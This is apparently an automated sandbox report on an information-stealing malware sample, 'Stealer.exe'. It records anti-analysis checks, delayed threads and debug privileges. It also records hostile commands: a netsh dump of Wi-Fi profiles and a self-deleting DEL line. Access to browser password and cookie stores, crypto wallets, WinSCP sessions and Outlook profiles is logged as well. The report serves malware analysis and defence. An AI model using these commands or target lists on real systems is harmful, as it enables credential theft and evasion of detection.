Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\Desktop\Stealer.exe Memory allocated: 2C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Stealer.exe Memory allocated: 1A1B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Stealer.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Stealer.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Stealer.exe Window / User API: threadDelayed 493
Source: C:\Users\user\Desktop\Stealer.exe Window / User API: threadDelayed 9341
Source: C:\Users\user\Desktop\Stealer.exe TID: 2692 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe TID: 2648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe TID: 2648 Thread sleep time: -3600000s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe TID: 2588 Thread sleep count: 493 > 30
Source: C:\Users\user\Desktop\Stealer.exe TID: 2588 Thread sleep count: 9341 > 30
Source: C:\Windows\System32\netsh.exe TID: 2700 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select TotalPhysicalMemory From Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Model from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Stealer.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Stealer.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Stealer.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Users\user\Desktop\Stealer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Stealer.exe Queries volume information: C:\Users\user\Desktop\Stealer.exe VolumeInformation
Source: C:\Users\user\Desktop\Stealer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Stealing of Sensitive Information

Source: Yara match File source: Stealer.exe, type: SAMPLE
Source: Yara match File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Stealer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\Outlook Files
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\Desktop\Stealer.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: Yara match File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Stealer.exe, type: SAMPLE
Source: Yara match File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR